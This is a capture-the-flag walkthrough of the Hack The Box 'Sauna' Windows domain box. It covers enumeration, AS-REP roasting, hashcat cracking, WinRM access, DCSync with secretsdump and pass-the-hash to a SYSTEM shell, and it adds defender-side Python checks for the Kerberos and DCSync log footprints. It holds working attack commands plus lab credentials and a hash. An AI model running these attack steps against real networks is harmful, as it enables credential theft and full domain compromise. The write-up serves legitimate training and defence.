Enumeration
Nmap - Discovering Open Ports
We start with an aggressive port scan to find all open TCP ports, followed by a more detailed scan of those ports to identify running services and versions.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.180 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.95.180
From the results, we learn that this machine is part of a Windows domain called egotistical-bank.local. Key services running include:
- IIS (web server) on port 80
- LDAP (directory service) on port 389
These are worth exploring further.
LDAP - Active Directory Enumeration
LDAP (Lightweight Directory Access Protocol) is used in Windows environments to manage users, groups, and more. We use windapsearch to search for domain info:
./windapsearch.py -d egotistical-bank.local --dc-ip 10.129.95.180 -U
It connects anonymously (no login required), but doesn’t return any useful results.
We also try Impacket’s GetADUsers.py, which queries Active Directory for user info:
GetADUsers.py egotistical-bank.local/ -dc-ip 10.129.95.180 -debug
Again, nothing useful is returned. Time to move on.
SMB - File Share Enumeration
We try accessing shared folders using smbclient:
smbclient -L \\\\10.129.95.180 -N
Anonymous access works, but no shares are listed. On to the next vector.
Web - Exploring the Website
Visiting http://10.129.95.180 shows a banking-themed website. Wappalyzer doesn’t flag any vulnerable tech.
We try directory brute-forcing:
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.95.180/FUZZ
The results are unremarkable until we view about.html, which contains the full names of staff; these can be used to generate candidate usernames.
Foothold
Username Generation
We can use the tool called Username Anarchy to create username formats from the list of employee names:
./username-anarchy --input-file fullnames.txt --select-format first,flast,first.last,firstl > unames.txt
ASREPRoasting - No Pre-Auth Kerberos Attack
In Active Directory, Kerberos pre-authentication is a security check that stops attackers from asking for encrypted data without proving who they are.
If it is turned off for an account, we can request a TGT (Ticket Granting Ticket) and extract a hash to crack offline.
This technique is called ASREPRoasting. We use Impacket’s GetNPUsers.py to test usernames:
while read p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.129.95.180 >> hash.txt; done < unames.txt
We get a hash for user fsmith.
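The exposure behind this step is a single userAccountControl bit, and the request itself shows up on the domain controller as a TGT request without pre-authentication. The following is an added defender-side check, not part of the original writeup; the account records and Security Event ID 4768 records are constructed sample data (the source IPs and the second account name are made up), and the field names mirror the Windows Security log fields.

```python
# Added example, not from the original writeup: flag accounts with Kerberos
# pre-authentication disabled and spot AS-REP roasting in sample 4768 events.

# userAccountControl bit that disables Kerberos pre-authentication.
DONT_REQ_PREAUTH = 0x400000
RC4_HMAC = 0x17  # ticket encryption type that offline crackers target

# Constructed sample: one account with pre-auth disabled, one hardened.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x410200},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200},
]

# Constructed sample 4768 events (TGT requested). PreAuthType 0 means the KDC
# issued the AS-REP without any pre-authentication, which is what GetNPUsers
# asks for; type 2 is the normal encrypted-timestamp pre-auth.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.10.14.5",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0x0},
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "10.129.95.50",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0x0},
    {"EventID": 4769, "TargetUserName": "jdoe", "IpAddress": "10.129.95.50",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0x0},
]


def accounts_without_preauth(accounts):
    """sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set."""
    return [a["sAMAccountName"] for a in accounts
            if a["userAccountControl"] & DONT_REQ_PREAUTH]


def suspicious_asrep_requests(events):
    """(user, source IP) for successful 4768 events with no pre-auth and RC4."""
    hits = []
    for e in events:
        if e["EventID"] != 4768 or e["Status"] != 0x0:
            continue
        if e["PreAuthType"] == 0 and e["TicketEncryptionType"] == RC4_HMAC:
            hits.append((e["TargetUserName"], e["IpAddress"]))
    return hits


if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("AS-REP roast candidates:", suspicious_asrep_requests(SAMPLE_EVENTS))
```

Clearing the DONT_REQ_PREAUTH bit on the flagged accounts removes the exposure; alerting on the 4768 pattern catches the request itself.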
Cracking the Hash with Hashcat
Let’s try cracking this hash using hashcat. First, confirm the mode for Kerberos AS-REP:
hashcat --help | grep Kerberos
Mode 18200 is what we need. Run:
hashcat -m 18200 hash.txt -o pass.txt /usr/share/wordlists/rockyou.txt --force
Eventually, the password is found: Thestrokes23.
WinRM - Remote Access as fsmith
Now we have credentials! We use evil-winrm to connect via WinRM (Windows Remote Management):
evil-winrm -i 10.129.95.180 -u fsmith -p 'Thestrokes23'
Once connected, we grab the user flag from:
C:\Users\Fsmith\Desktop\user.txt
Privilege Escalation
WinPEAS - Finding PrivEsc Vectors
We run WinPEAS.exe (a privilege escalation enumeration script). Upload it via evil-winrm and execute.
It finds that user svc_loanmanager has auto-logon enabled, and reveals the password: Moneymakestheworldgoround!
Examination of C:\Users\ confirms that the similarly named svc_loanmgr has logged on locally.
We confirm that this account exists and is part of the Remote Management Users group:
net user svc_loanmgr
Now log in with the new credentials:
evil-winrm -i 10.129.95.180 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Bloodhound - AD Attack Path Mapping
BloodHound helps us find privilege escalation paths in Active Directory.
First, collect data using bloodhound-python:
bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c All
Zip the collected files:
zip bloodhound.zip *.json
Set up BloodHound Community Edition (see official Kali guide):
sudo bloodhound-setup
Open BloodHound:
Go to http://localhost:7474, log in with the default creds neo4j:neo4j, then change the password. Update /etc/bhapi/bhapi.json accordingly.
Run BloodHound and import the zip file:
sudo bloodhound
Search for SVC_LOANMGR and select Outbound Object Control. We note that the SVC_LOANMGR node is connected to the EGOTISTICAL-BANK.LOCAL node via the GetChangesAll edge.
After clicking on the edge and selecting Linux Abuse, we find that svc_loanmgr has the GetChangesAll privilege on the domain, which means it can perform a DCSync attack.
DCSync - Dumping Domain Admin Hash
DCSync simulates the behaviour of a Domain Controller to ask for password hashes of other users. Very powerful!
Run the following command:
secretsdump.py egotistical-bank/svc_loanmgr@10.129.95.180 -just-dc-user Administrator
It gives us the NTLM hash of the Administrator account.
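Because DCSync exercises the same replication extended rights a real domain controller uses, it leaves a Directory Service Access record (Security Event ID 4662) on the DC naming the requesting principal and the rights it used. The following is an added defender-side filter for that footprint, not part of the original writeup; the events are constructed sample data, and DC01$ is an assumed domain controller computer account (the page does not name the DC).

```python
# Added example, not from the original writeup: flag 4662 events in which a
# non-DC principal exercised a replication extended right (the DCSync footprint).

# Extended-right GUIDs from the AD schema that directory replication requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

CONTROL_ACCESS = 0x100  # 4662 Access Mask value for extended/control access rights

# Constructed sample: legitimate DC-to-DC replication (DC01$ is assumed), the
# svc_loanmgr replication from this box, and an unrelated object read.
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": 0x100,
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": 0x100,
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": 0x10,
     "Properties": ["bf967aba-0de6-11d0-a285-00aa003049e2"]},  # user object class
]


def dcsync_candidates(events, dc_accounts):
    """(subject, rights) for control-access 4662 events that exercise a
    replication right and come from a principal that is not a DC account."""
    known_dcs = {d.upper() for d in dc_accounts}
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != CONTROL_ACCESS:
            continue
        if e["SubjectUserName"].upper() in known_dcs:
            continue
        rights = [REPLICATION_RIGHTS[g] for g in e["Properties"]
                  if g in REPLICATION_RIGHTS]
        if rights:
            hits.append((e["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    print(dcsync_candidates(SAMPLE_4662, ["DC01$"]))
```

Auditing which principals hold these rights on the domain object (the GetChangesAll edge BloodHound surfaced above) is the preventive counterpart to this log-side check.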
SYSTEM Access via Pass-the-Hash
Finally, we use psexec.py with the Administrator’s hash to get a SYSTEM shell:
psexec.py egotistical-bank.local/administrator@10.129.95.180 -hashes :823452073d75b9d1cf70ebdf86c7f98e
The root flag is located here:
C:\Users\Administrator\Desktop\root.txt
References
- HTB’s official writeup for Sauna
- Username Anarchy
- BloodHound Setup Guide